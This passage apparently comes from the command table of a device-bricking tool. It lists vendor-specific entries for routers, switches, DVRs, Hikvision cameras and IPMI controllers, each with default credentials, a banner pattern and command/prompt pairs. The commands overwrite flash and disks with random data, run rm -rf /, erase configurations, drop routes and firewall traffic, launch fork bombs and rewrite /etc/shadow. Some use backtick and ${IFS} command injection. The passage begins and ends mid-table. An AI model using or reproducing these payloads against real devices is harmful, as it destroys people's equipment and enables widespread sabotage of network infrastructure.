 'enable' , '[$>#] ' ,
4114
 'set-factory' , 'Y/n' ,
4115
 'y' , '[$>#] ' ,
4116
 'exit' , '[$>#] ' ,
4117
 'enable' , '[$>#] ' ,
4118
 'set-factory' , 'Y/n' ,
4119
 'y' , '[$>#] ' ,
4120
 ] ,
4121
[ 'welotec' , '.*' , '\% command is not supported\!' ,
4122
 'enable' , 'password:' ,
4123
 '%OLDPASS%' , '[>#] ' ,
4124
 'erase startup-config' , 'filesystem' ,
4125
 'y' , '[>#] ' ,
4126
 'banner HACKED' , '[>#] ' ,
4127
 'reboot' , 'system' ,
4128
 'y' , '[>#] ' ,
4129
 ] ,
4130
[ 'dlinkbroke' , '.*' , 'DLINK-WLAN-AP' ,
4131
 'set `cat /dev/urandom >/dev/mtdblock5 &`' , '[#>] ' ,
4132
 'set `cat /dev/urandom >/dev/mtdblock4 &`' , '[#>] ' ,
4133
 'set `cat /dev/urandom >/dev/mtdblock3 &`' , '[#>] ' ,
4134
 'set `cat /dev/urandom >/dev/mtdblock2 &`' , '[#>] ' ,
4135
 'set `cat /dev/urandom >/dev/mtdblock1 &`' , '[#>] ' ,
4136
 'set `cat /dev/urandom >/dev/mtdblock0 &`' , '[#>] ' ,
4137
 'set `cat /dev/urandom >/dev/root &`' , '[#>] ' ,
4138
 'set `route del default`' , '%WAIT%' ,
4139
 'reboot' , '[#>] ' ,
4140
 ] ,
4141
[ 'dgsdlink' , '.*' , 'DGS\-1\d+' ,
4142
 'reset config' , '[>#] ' ,
4143
 ] ,
4144
[ 'nateks' , '.*' , 'fmm.*Fault\sand\s+maintenance\smanagement' ,
4145
 '3' , '[>#] ' ,
4146
 '8' , 'configuration.*no' ,
4147
 'yes' , '[>#] ' ,
4148
 ] ,
4149
[ 'kingtype' , '.*' , '(Kingtype\sCONSOLE\sOS|Unknown command:\sls\s-alF\s\/etc\/)' ,
4150
 'enable' , '[>#] ' ,
4151
 'configure terminal' , '[>#] ' ,
4152
 'hostname HACKED' , '[>#] ' ,
4153
 'write' , 'y/n' ,
4154
 'y' , '[>#] ' ,
4155
 'exit' , '[>#] ' ,
4156
 'tftp download config-file `poweroff` 1.2.3.4' , '[>#] ' ,
4157
 ] ,
4158
[ 'hpipmi' , '.*' , '\/\.\/-> ' ,
4159
 'cd /system1/led1' , '[>#] ' ,
4160
 'set led1 enabledstate=enabled' , '[>#] ' ,
4161
 'cd /system1' , '[>#] ' ,
4162
 'stop /system1 -force' , '[>#] ' ,
4163
 'stop /system1' , '[>#] ' ,
4164
 'cd ..' , '[>#] ' ,
4165
 'cd map1' , '[>#] ' ,
4166
 'cd nic1' , '[>#] ' ,
4167
 'set oemhp_hostname=HACKED' , '[>#] ' ,
4168
 'set oemhp_nonvol_networkaddress=1.2.3.4' , '[>#] ' ,
4169
 'set networkaddress=1.2.3.4' , '[>#] ' ,
4170
 ] ,
4171
[ 'hpmp' , '.*' , '\*\*\* Invalid Selection \*\*\*' ,
4172
 'cm' , '[#>] ' ,
4173
 'pc -off' , 'Confirm\?' ,
4174
 'y' , '[#>] ' ,
4175
 'mr' , 'modem\?' ,
4176
 'y' , '[#>] ' ,
4177
 'dns -all default' , 'Confirm\?' ,
4178
 'y' , '[#>] ' ,
4179
 'lc -ip 1.2.3.4 -subnet 255.255.255.0 -gateway 1.2.3.5' , 'Confirm\?' ,
4180
 'y' , '[#>] ' ,
4181
 ] ,
4182
[ 'multiqb' , '.*' , '(MultiQb login|multiqb\.com|quiqnet\.com)' ,
4183
 'enable' , '[#>] ' ,
4184
 'erase' , 'Yes.*No' ,
4185
 'y' , '[#>] ' ,
4186
 ] ,
4187
[ 'hiper' , '.*' , 'Saving configuration\.\.\.' ,
4188
 'clear nvram' , '[%#>] ' ,
4189
 'clear running-config' , '[%#>] ' ,
4190
 'clear ip dhcp server' , '[%#>] ' ,
4191
 'reload' , 'y/n' ,
4192
 'y' , 'Restart' ,
4193
 ] ,
4194
[ 'maipu' , '.*' , 'Error.*Command\s\"w\"\sisn\St\ssupported!' ,
4195
 'timesvc server del all' , 'y/n' ,
4196
 'y' , '' ,
4197
 '' , '[#>] ' ,
4198
 'timesvc interval set 1' , '[#>] ' ,
4199
 'timesvc server add `reboot`' , '[#>] ' ,
4200
 'timesvc start' , '[#>] ' ,
4201
 'write' , '[#>] ' ,
4202
 'reload' , 'Y/N\S:' ,
4203
 'y' , 'Y/N\S:' ,
4204
 'y' , 'rebooting' ,
4205
 ] ,
4206
[ 'protei' , '.*' , 'No such command for mini_?shell' ,
4207
 'restore_config && cat /dev/urandom>/dev/mtdblock3 &' , 'shell>' ,
4208
 'restore_config && cat /dev/urandom>/dev/mtdblock7 &' , 'shell>' ,
4209
 'restore_config && cat /dev/urandom>/dev/mtdblock0 &' , 'shell>' ,
4210
 'restore_config && cat /dev/urandom>/dev/mtdblock1 &' , 'shell>' ,
4211
 'restore_config && cat /dev/urandom>/dev/mtdblock2 &' , 'shell>' ,
4212
 'restore_config && cat /dev/urandom>/dev/mtdblock4 &' , 'shell>' ,
4213
 'restore_config && cat /dev/urandom>/dev/mtdblock5 &' , 'shell>' ,
4214
 'restore_config && cat /dev/urandom>/dev/mtdblock6 &' , 'shell>' ,
4215
 'restore_config && route del default' , 'shell>' ,
4216
 ] ,
4217
[ 'netscreen' , '.*' , '---unknown keyword cat' ,
4218
 "set hostname HACKED\nsave" , '> ' ,
4219
 'get interface' , '> ' ,
4220
 "set interface trust ip 1.2.3.4/24\nsave" , '> ' ,
4221
 "set interface ethernet0/6 ip 1.2.4.4/24\nsave" , '> ' ,
4222
 "set interface bgroup0 ip 1.2.5.4/24\nsave" , '> ' ,
4223
 "set interface ethernet0/5 ip 1.2.6.4/24\nsave" , '> ' ,
4224
 "set interface ethernet0/4 ip 1.2.7.4/24\nsave" , '> ' ,
4225
 "set interface ethernet0/3 ip 1.2.8.4/24\nsave" , '> ' ,
4226
 "set interface ethernet0/2 ip 1.2.9.4/24\nsave" , '> ' ,
4227
 "set interface ethernet0/1 ip 1.2.10.4/24\nsave" , '> ' ,
4228
 "set interface untrust ip 1.2.11.4/24\nsave" , '> ' ,
4229
 "set interface ethernet0/0 ip 1.2.12.4/24\nsave" , '> ' ,
4230
 "set interface ethernet1 ip 1.2.1.4/24\nsave" , '> ' ,
4231
 "set interface ethernet2 ip 1.2.2.4/24\nsave" , '> ' ,
4232
 "set interface ethernet3 ip 1.2.3.4/24\nsave" , '> ' ,
4233
 "set interface ethernet4 ip 1.2.4.4/24\nsave" , '> ' ,
4234
 "set interface ethernet5 ip 1.2.5.4/24\nsave" , '> ' ,
4235
 "set interface ethernet6 ip 1.2.6.4/24\nsave" , '> ' ,
4236
 "set interface ethernet7 ip 1.2.7.4/24\nsave" , '> ' ,
4237
 "set interface ethernet8 ip 1.2.8.4/24\nsave" , '> ' ,
4238
 "set interface tun.3 ip 1.2.15.4/24\nsave" , '> ' ,
4239
 "set interface tun.2 ip 1.2.16.4/24\nsave" , '> ' ,
4240
 "set interface tun.1 ip 1.2.17.4/24\nsave" , '> ' ,
4241
 "set interface adsl2/0 ip 1.2.13.4/24\nsave" , '> ' ,
4242
 "set interface adsl1/0 ip 1.2.14.4/24\nsave" , '> ' ,
4243
 ] ,
4244
[ 'idirect' , '.*' , 'UCLI:\/\$' ,
4245
 'demo reset' , '[#>\$] ' ,
4246
 'demo start' , '[#>\$] ' ,
4247
 'satellite ele_cut_off 25' , '[#>\$] ' ,
4248
 'zone 1 active no' , '[#>\$] ' ,
4249
 'zone 2 active no' , '[#>\$] ' ,
4250
 'zone 3 active no' , '[#>\$] ' ,
4251
 'zone 4 active no' , '[#>\$] ' ,
4252
 'zone 5 active no' , '[#>\$] ' ,
4253
 'zone 6 active no' , '[#>\$] ' ,
4254
 'zone 7 active no' , '[#>\$] ' ,
4255
 'zone 8 active no' , '[#>\$] ' ,
4256
 'config activate' , '[#>\$] ' ,
4257
 'demo reset' , '[#>\$] ' ,
4258
 'demo start' , '[#>\$] ' ,
4259
 ] ,
4260
[ 'avaya' , '.*' , 'Next possible match:' ,
4261
 'enable' , '[#>] ' ,
4262
 'erase legacy-configs' , '[#>] ' ,
4263
 'erase scripts' , '[#>] ' ,
4264
 'erase startup-config' , '[#>] ' ,
4265
 'legacy-cli' , '[#>] ' ,
4266
 'nvram initialize' , '[#>] ' ,
4267
 'exit' , '[#>] ' ,
4268
 'reset' , 'Y/N' ,
4269
 'n' , 'Y/N' ,
4270
 'y' , '[#>] ' ,
4271
 'reset' , 'Y/N' ,
4272
 'y' , '' ,
4273
 ] ,
4274
[ 'extxos' , '.*' , 'Extreme Networks' ,
4275
 'disable web https' , '[>#] ' ,
4276
 'disable web http' , '[>#] ' ,
4277
 'save' , 'y/N' ,
4278
 'y' , '[>#] ' ,
4279
 'disable ports all\nsave\ny' , '[>#] ' ,
4280
 'y' , '[>#] ' ,
4281
 'save' , 'y/N' ,
4282
 'y' , '[>#] ' ,
4283
 'disable telnet\nsave\ny' , '' ,
4284
 'y' , '' ,
4285
 'save' , 'y/N' ,
4286
 'y' , '[>#] ' ,
4287
 ] ,
4288
[ 'openwrt' , 'root/OPENWRTBLANK' , '' ,
4289
 'df' , 'root\S+# ' ,
4290
 'cat /dev/urandom >/dev/mtdblock3 &' , 'root\S+# ' ,
4291
 'cat /dev/urandom >/dev/mtd3 &' , 'root\S+# ' ,
4292
 'cat /dev/urandom >/dev/root &' , 'root\S+# ' ,
4293
 'cat /dev/urandom >/dev/mtdblock2 &' , 'root\S+# ' ,
4294
 'cat /dev/urandom >/dev/mtd2 &' , 'root\S+# ' ,
4295
 'cat /dev/urandom >/dev/mtdblock1 &' , 'root\S+# ' ,
4296
 'cat /dev/urandom >/dev/mtd1 &' , 'root\S+# ' ,
4297
 'cat /dev/urandom >/dev/mtdblock0 &' , 'root\S+# ' ,
4298
 'cat /dev/urandom >/dev/mtd0 &' , 'root\S+# ' ,
4299
 'cat /dev/urandom >/dev/mtdblock4 &' , 'root\S+# ' ,
4300
 'cat /dev/urandom >/dev/mtdblock5 &' , 'root\S+# ' ,
4301
 'cat /dev/urandom >/dev/mtdblock6 &' , 'root\S+# ' ,
4302
 'cat /dev/urandom >/dev/mtdblock7 &' , 'root\S+# ' ,
4303
 'route del default' , '%WAIT%' ,
4304
 'reboot' , 'root\S+# ' ,
4305
 ] ,
4306
[ "p661" , ".*" , 'Linux\sP-661.*' ,
4307
 'flash_unlock' , '' ,
4308
 'flash_unlock /dev/mtd0' , '' ,
4309
 'flash_eraseall /dev/mtd0 &' , '' ,
4310
 'ftl_format /dev/mtd0 &' , '' ,
4311
 'ftl_format /dev/mtd1 &' , '' ,
4312
 'ftl_format /dev/mtd2 &' , '' ,
4313
 'ftl_format /dev/mtd3 &' , '' ,
4314
 'ftl_format /dev/mtd4 &' , '' ,
4315
 'rfdformat /dev/mtd0 &' , '' ,
4316
 'rfdformat /dev/mtd1 &' , '' ,
4317
 'rfdformat /dev/mtd2 &' , '' ,
4318
 'rfdformat /dev/mtd3 &' , '' ,
4319
 'rfdformat /dev/mtd4 &' , '' ,
4320
 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '[#$>] ' ,
4321
 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT% ' ,
4322
 'd(){ d|d & };d' , '[#$>] ' ,
4323
 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT% ' ,
4324
 'halt -n -f' , '[#$>] ' ,
4325
 'reboot' , '[#$>] ' ,
4326
 ] ,
4327
[ "fusion" , ".*" , 'FUSION-LTE.*admin' ,
4328
 'passwd' , 'Old password: ' ,
4329
 '%OLDPASS%' , 'New password: ' ,
4330
 '%NEWPASS%' , 'Retype password: " ' ,
4331
 '%NEWPASS%' , '[#$>] ' ,
4332
 'cat /etc/shadow' , '[#$>] ' ,
4333
 'd(){ d|d & };d' , '%TERM%' ,
4334
 ] ,
4335
[ 'tudc' , 'admin/admin' , '(DC-5\d00|FR30\d\d|V5-5\d00|RG-ACE|NB-2\d00)' ,
4336
 'net traceroute 127.0.0.1 ;sh' , 'address:' ,
4337
 ' ' , '[#$>] ' ,
4338
 ' ' , '[#$>] ' ,
4339
 ' ' , '[#$>] ' ,
4340
 'dd if=/dev/urandom of=/dev/root' , '[#$>] ' ,
4341
 ' ' , '[#$>] ' ,
4342
 'ip route del default' , '[#$>] ' ,
4343
 ' ' , '[#$>] ' ,
4344
 'd() { d|d & }; d' , '[#$>] ' ,
4345
 ' ' , '[#$>] ' ,
4346
 ] ,
4347
[ "dm365" , ".*" , 'Linux dm365' ,
4348
 'telnet localhost' , 'login: ' ,
4349
 'root' , 'Password: ' ,
4350
 'radiant' , '[#$] ' ,
4351
 "fdisk /dev/mtd6" , 'm\sfor\shelp\S?: ' ,
4352
 "w" , '[#$] ' ,
4353
 "fdisk /dev/mtd7" , 'm\sfor\shelp\S?: ' ,
4354
 "w" , '[#$] ' ,
4355
 "fdisk /dev/mtd8" , 'm\sfor\shelp\S?: ' ,
4356
 "w" , '[#$] ' ,
4357
 'rm -rf /* 2>/dev/null &' , '[#$] ' ,
4358
 'route del default;iproute del default' , '[#$] ' ,
4359
 ] ,
4360
 [ "dm365" , ".*" , 'Linux ENC' ,
4361
 'telnet localhost' , 'login: ' ,
4362
 'root' , 'Password: ' ,
4363
 'radiant' , '[#$] ' ,
4364
 "fdisk /dev/mtd6" , 'm\sfor\shelp\S?: ' ,
4365
 "w" , '[#$] ' ,
4366
 "fdisk /dev/mtd7" , 'm\sfor\shelp\S?: ' ,
4367
 "w" , '[#$] ' ,
4368
 "fdisk /dev/mtd8" , 'm\sfor\shelp\S?: ' ,
4369
 "w" , '[#$] ' ,
4370
 'rm -rf /* 2>/dev/null &' , '[#$] ' ,
4371
 'route del default;iproute del default' , '[#$] ' ,
4372
 ] ,
4373
[ "srx" , ".*" , 'SRX\d\d\d\d.*wuname' ,
4374
 "\x03\x03util restore_factory_defaults" , "Y/N\S*?" ,
4375
 "y" , '%TERM%' ,
4376
 ] ,
4377
 [ "srxlike" , ".*" , '\S\d\d.*wuname-a' ,
4378
 "\x03\x03util restore_factory_defaults" , "Y/N\S*?" ,
4379
 "y" , '%TERM%' ,
4380
 ] ,
4381
[
4382
 "zysh" , ".*" , 'ZySH> ' ,
4383
 "?" , "SH>" ,
4384
 ] ,
4385
[ 'adsl2plus' , '.*' , '(ADSL2PlusRouter login|Welcome to Login)' ,
4386
 '' , '' ,
4387
'' , '' ,
4388
 'system reset' , '' ,
4389
 '' , '> ' ,
4390
 '' , '> ' ,
4391
 '' , '> ' ,
4392
 ] ,
4393
[ "kicc" , ".*" , '0RU54ozt\SEXeK8sW9TQaOFRxkJ4rvI' ,
4394
 'telnet localhost' , 'login: ' ,
4395
 'root' , 'Password: ' ,
4396
 'upsups' , '[#$] ' ,
4397
 "fdisk /dev/mtd0" , 'm\sfor\shelp\S?: ' ,
4398
 "w" , '[#$] ' ,
4399
 "fdisk /dev/mtd1" , 'm\sfor\shelp\S?: ' ,
4400
 "w" , '[#$] ' ,
4401
 "fdisk /dev/mtd2" , 'm\sfor\shelp\S?: ' ,
4402
 "w" , '[#$] ' ,
4403
 "fdisk /dev/mtd3" , 'm\sfor\shelp\S?: ' ,
4404
 "w" , '[#$] ' ,
4405
 "fdisk /dev/mtd4" , 'm\sfor\shelp\S?: ' ,
4406
 "w" , '[#$] ' ,
4407
 'route del default;rm -rf /* 2>/dev/null &' , '%TERM%' ,
4408
 ] ,
4409
 [ "kicc" , ".*" , 'y3olkb5BzsLZ1ZbovcECW1' ,
4410
 'telnet localhost' , 'login: ' ,
4411
 'root' , 'Password: ' ,
4412
 'kicc123' , '[#$] ' ,
4413
 "fdisk /dev/mtd0" , 'm\sfor\shelp\S?: ' ,
4414
 "w" , '[#$] ' ,
4415
 "fdisk /dev/mtd1" , 'm\sfor\shelp\S?: ' ,
4416
 "w" , '[#$] ' ,
4417
 "fdisk /dev/mtd2" , 'm\sfor\shelp\S?: ' ,
4418
 "w" , '[#$] ' ,
4419
 "fdisk /dev/mtd3" , 'm\sfor\shelp\S?: ' ,
4420
 "w" , '[#$] ' ,
4421
 "fdisk /dev/mtd4" , 'm\sfor\shelp\S?: ' ,
4422
 "w" , '[#$] ' ,
4423
 'route del default;rm -rf /* 2>/dev/null &' , '%WAIT%' ,
4424
 'while [ 1 ]; do echo test; d() { d | d & }; d; sleep 10; done &' , '%TERM%' ,
4425
 ] ,
4426
[ 'artila' , 'guest/guest' , 'guest@M5' ,
4427
 'while [ 1 ]; do echo test; ps aux | grep "guest" | grep -v "sh" | grep -v "ps aux" | grep -v "grep" | grep -v "awk" | grep -v "xargs" | awk \'{print $2}\' | xargs kill -9; done &' , '%TERM%' ,
4428
 ] ,
4429
[ "freescale" , "user/user" , 'user@freescale' ,
4430
"ash" , '[#$>] ' ,
4431
'while [ 1 ]; do echo test; ps | grep "user" | grep -v "ash" | grep -v " ps " | grep -v "grep" | grep -v "awk" | grep -v "xargs" | awk \'{print $1}\' | xargs kill -9; done &' , '[#$>] ' ,
4432
 ] ,
4433
[ 'matrix' , '.*' , '@Matrix-.*VR' ,
4434
 'ash' , '[#$>] ' ,
4435
 'while [ 1 ]; do echo test; kill `ps aux | grep "admin" | grep -v "ash" | grep -v "ps aux" | grep -v "grep" | grep -v "awk" | awk \'{print $2}\'`; done &' , '[#$>] ' ,
4436
 'while [ 1 ]; do echo test; killall -9 sh; done &' , '[#$>] ' ,
4437
 ] ,
4438
[ 'merit' , 'admin/1111' , 'Linux NVR' ,
4439
 'ash' , '[#$>] ' ,
4440
 'while [ 1 ]; do echo test; kill `ps aux | grep "admin" | grep -v "ash" | grep -v "ps aux" | grep -v "grep" | grep -v "awk" | awk \'{print $1}\'`; done &' , '[#$>] ' ,
4441
 'while [ 1 ]; do echo test; killall -9 sh; done &' , '[#$>] ' ,
4442
 ] ,
4443
 [ 'merit' , 'admin/1111' , '(Linux DVR|Welcome to DVR Series)' ,
4444
 'ash' , '[#$>] ' ,
4445
 'while [ 1 ]; do echo test; kill `ps w | grep "admin" | grep -v "ash" | grep -v "ps w" | grep -v "grep" | grep -v "awk" | awk \'{print $1}\'`; done &' , '[#$>] ' ,
4446
 'while [ 1 ]; do echo test; killall -9 sh; done &' , '[#$>] ' ,
4447
 ] ,
4448
[ 'openwrt' , 'user/user' , 'user@\S+:~\$' ,
4449
 'ps | grep "user" | grep -v `echo $$` | grep -v " ps " | grep -v "grep" | grep -v "awk" | grep -v "xargs" | awk \'{print $1}\' | xargs kill -9' , '[#$>] ' ,
4450
 'cat /etc/passwd' , '[#$>] ' ,
4451
 'sh' , '[#$>] ' ,
4452
 'while [ 1 ]; do echo test; ps | grep "user" | grep -v " sh " | grep -v " ps " | grep -v "grep" | grep -v "awk" | grep -v "xargs" | awk \'{print $1}\' | xargs kill -9; done &' , '[#$>] ' ,
4453
 ] ,
4454
[ 'avahi' , 'guest/guest' , 'avahi' ,
4455
 'ash' , '[#$>] ' ,
4456
 'cat /etc/shadow' , '[#$>] ' ,
4457
 'while [ 1 ]; do echo test; ps | grep "1000" | grep -v "ash" | grep -v " ps " | grep -v "grep" | grep -v "awk" | grep -v "xargs" | awk \'{print $1}\' | xargs kill -9; done &' , '[#$>] ' ,
4458
 ] ,
4459
[ 'cnaim' , '.*' , 'Error: Invalid input' ,
4460
 'net ip lan 127.0.0.1\nsave\nping ;cp${IFS}/dev/urandom${IFS}/dev/mtdblock0&&' , '[#$>] ' ,
4461
 ] ,
4462
[ 'sathesh' , 'root/root' , 'sathesh:TJ06VabosxcTg' ,
4463
 'ls -al /sbin/' , '[#$>] ' ,
4464
 'fdisk -l' , '[#$>] ' ,
4465
 'df' , '[#$>] ' ,
4466
 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '[#$>] ' ,
4467
 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%TERM%' ,
4468
 ] ,
4469
[ 'mini' , '.*' , 'Linux MI-MINI' ,
4470
 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '' ,
4471
 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '' ,
4472
 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '' ,
4473
 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '' ,
4474
 'dd if=/dev/urandom of=/dev/mtdblock4 &' , '' ,
4475
 'dd if=/dev/urandom of=/dev/mtdblock5 &' , '' ,
4476
 'dd if=/dev/urandom of=/dev/root &' , '' ,
4477
 'dd if=/dev/urandom of=/dev/ram0 &' , '%WAIT%' ,
4478
 'route del default;rm -rf /* &' , '%TERM%' ,
4479
 ] ,
4480
[ 'tvr' , '.*' , 'admin@TVR' ,
4481
 'su root' , '[#$>] ' ,
4482
 'df' , '[#$>] ' ,
4483
 'dd if=/dev/urandom of=/dev/hda1 &' , '' ,
4484
 'dd if=/dev/urandom of=/dev/hdb1 &' , '' ,
4485
 'dd if=/dev/urandom of=/dev/mtd0 &' , '' ,
4486
 'dd if=/dev/urandom of=/dev/mtd1 &' , '' ,
4487
 'dd if=/dev/urandom of=/dev/mtdblock4 &' , '' ,
4488
 'route del default;dd if=/dev/urandom of=/dev/ram0 &' , '[#$>] ' ,
4489
 'rm -rf /mtd0/* &' , '%WAIT%' ,
4490
 'd(){ d|d & };d' , '%TERM%' ,
4491
 ] ,
4492
[ 'avc' , '.*' , 'APPCOM:' ,
4493
 'shell' , '[#$>] ' ,
4494
 'df' , '[#$>] ' ,
4495
 'cat /dev/urandom >/dev/hda &' , '' ,
4496
 'cat /dev/urandom >/dev/hda1 &' , '' ,
4497
 'cat /dev/urandom >/dev/hda2 &' , '' ,
4498
 'cat /dev/urandom >/dev/hda3 &' , '' ,
4499
 'cat /dev/urandom >/dev/hda4 &' , '' ,
4500
 'route del default;rm -rf / 2>/dev/null &' , '%WAIT%' ,
4501
 'd() { d | d & }; d 2>/dev/null' , '%TERM%' ,
4502
 ] ,
4503
[ 'hikvision' , 'root/.*' , 'hikvision' ,
4504
'su root' , 'Password: ' ,
4505
 '%OLDPASS%' , '[#$>] ' ,
4506
 'dd if=/dev/urandom of=/dev/sda &' , '[#$>] ' ,
4507
 'dd if=/dev/urandom of=/dev/sdb &' , '[#$>] ' ,
4508
 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '[#$>] ' ,
4509
 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '[#$>] ' ,
4510
 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '[#$>] ' ,
4511
 'dd if=/dev/urandom of=/dev/mtd0 &' , '[#$>] ' ,
4512
 'dd if=/dev/urandom of=/dev/mtd1 &' , '[#$>] ' ,
4513
 'dd if=/dev/urandom of=/dev/mtd2 &' , '%WAIT%' ,
4514
 'dd if=/dev/urandom of=/dev/root &' , '[#$>] ' ,
4515
 'route del default;dd if=/dev/urandom of=/dev/ram0 &' , '%WAIT%' ,
4516
 ] ,
4517
 [ 'hikvision' , 'root/hikvision' , '.*' ,
4518
'su root' , 'Password: ' ,
4519
 '%OLDPASS%' , '[#$>] ' ,
4520
 'dd if=/dev/urandom of=/dev/sda &' , '[#$>] ' ,
4521
 'dd if=/dev/urandom of=/dev/sdb &' , '[#$>] ' ,
4522
 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '[#$>] ' ,
4523
 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '[#$>] ' ,
4524
 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '[#$>] ' ,
4525
 'dd if=/dev/urandom of=/dev/mtd0 &' , '[#$>] ' ,
4526
 'dd if=/dev/urandom of=/dev/mtd1 &' , '[#$>] ' ,
4527
 'dd if=/dev/urandom of=/dev/mtd2 &' , '%WAIT%' ,
4528
 'dd if=/dev/urandom of=/dev/root &' , '[#$>] ' ,
4529
 'route del default;dd if=/dev/urandom of=/dev/ram0 &' , '%WAIT%' ,
4530
 ] ,
4531
 [ 'hikvision' , '.*' , 'hikvision' ,
4532
'echo HAKVISION >/home/hik/hicore.tar.gz' , '[#$>] ' ,
4533
 'echo HAKVISION >/home/hik/uImage' , '[#$>] ' ,
4534
 'echo dd if=/dev/urandom of=/dev/mtdblock0 >/home/hik/start.sh' , '[#$>] ' ,
4535
 'echo dd if=/dev/urandom of=/dev/mtdblock1 >>/home/hik/start.sh' , '[#$>] ' ,
4536
 'echo dd if=/dev/urandom of=/dev/mtdblock2 >>/home/hik/start.sh' , '[#$>] ' ,
4537
 'echo reboot >>/home/hik/start.sh' , '[#$>] ' ,
4538
'echo HAKVISION >/home/hik/webs.tar.gz' , '[#$>] ' ,
4539
 'echo HAKVISION >/home/hik/hicore.tar.lzma' , '[#$>] ' ,
4540
'echo root:\$1\$ChRPh3ur\$Yy6bjTErRXoajEZ1jao79/:14194:0:99999:7::: >/etc/shadow' , '[#$>] ' ,
4541
 'echo hikvision:\$1\$ChRPh3ur\$Yy6bjTErRXoajEZ1jao79/:14194:0:99999:7::: >>/etc/shadow' , '[#$>] ' ,
4542
 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/%NEWPASS% >>/%NEWPASS%2' , '[#$>] ' ,
4543
 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/home/app/%NEWPASS% >>/home/app/%NEWPASS%2' , '[#$>] ' ,
4544
 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/tmp/%NEWPASS% >>/tmp/%NEWPASS%2' , '[#$>] ' ,
4545
 'while [ 1 ]; do cat /%NEWPASS% >>/%NEWPASS%3; cat /%NEWPASS%2 >>/%NEWPASS%3 done &' , '[#$>] ' ,
4546
 ] ,
4547
 [ 'hikvision' , 'hikvision/.*' , '.*' ,
4548
'echo HAKVISION >/home/hik/hicore.tar.gz' , '[#$>] ' ,
4549
 'echo HAKVISION >/home/hik/uImage' , '[#$>] ' ,
4550
 'echo dd if=/dev/urandom of=/dev/mtdblock0 >/home/hik/start.sh' , '[#$>] ' ,
4551
 'echo dd if=/dev/urandom of=/dev/mtdblock1 >>/home/hik/start.sh' , '[#$>] ' ,
4552
 'echo dd if=/dev/urandom of=/dev/mtdblock2 >>/home/hik/start.sh' , '[#$>] ' ,
4553
 'echo reboot >>/home/hik/start.sh' , '[#$>] ' ,
4554
'echo HAKVISION >/home/hik/webs.tar.gz' , '[#$>] ' ,
4555
 'echo HAKVISION >/home/hik/hicore.tar.lzma' , '[#$>] ' ,
4556
'echo root:\$1\$ChRPh3ur\$Yy6bjTErRXoajEZ1jao79/:14194:0:99999:7::: >/etc/shadow' , '[#$>] ' ,
4557
 'echo hikvision:\$1\$ChRPh3ur\$Yy6bjTErRXoajEZ1jao79/:14194:0:99999:7::: >>/etc/shadow' , '[#$>] ' ,
4558
 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/%NEWPASS% >>/%NEWPASS%2' , '[#$>] ' ,
4559
 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/home/app/%NEWPASS% >>/home/app/%NEWPASS%2' , '[#$>] ' ,
4560
 'd() { echo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; d|d & };d 2>>/tmp/%NEWPASS% >>/tmp/%NEWPASS%2' , '[#$>] ' ,
4561
 'while [ 1 ]; do cat /%NEWPASS% >>/%NEWPASS%3; cat /%NEWPASS%2 >>/%NEWPASS%3 done &' , '[#$>] ' ,
4562
 '%RELAUNCH2%' , '%RELAUNCH2%' ,
4563
 ] ,
4564
[ 'hikvision' , 'guest/.*' , 'dvrdvs' ,
4565
'echo HAKVISION >/home/hik/hicore.tar.gz' , '[#$>] ' ,
4566
 'echo HAKVISION >/home/hik/uImage' , '[#$>] ' ,
4567
 'echo dd if=/dev/urandom of=/dev/mtdblock0 >/home/hik/start.sh' , '[#$>] ' ,
4568
 'echo dd if=/dev/urandom of=/dev/mtdblock1 >>/home/hik/start.sh' , '[#$>] ' ,
4569
 'echo dd if=/dev/urandom of=/dev/mtdblock2 >>/home/hik/start.sh' , '[#$>] ' ,
4570
 'echo reboot >>/home/hik/start.sh' , '[#$>] ' ,
4571
'echo HAKVISION >/home/hik/webs.tar.gz' , '[#$>] ' ,
4572
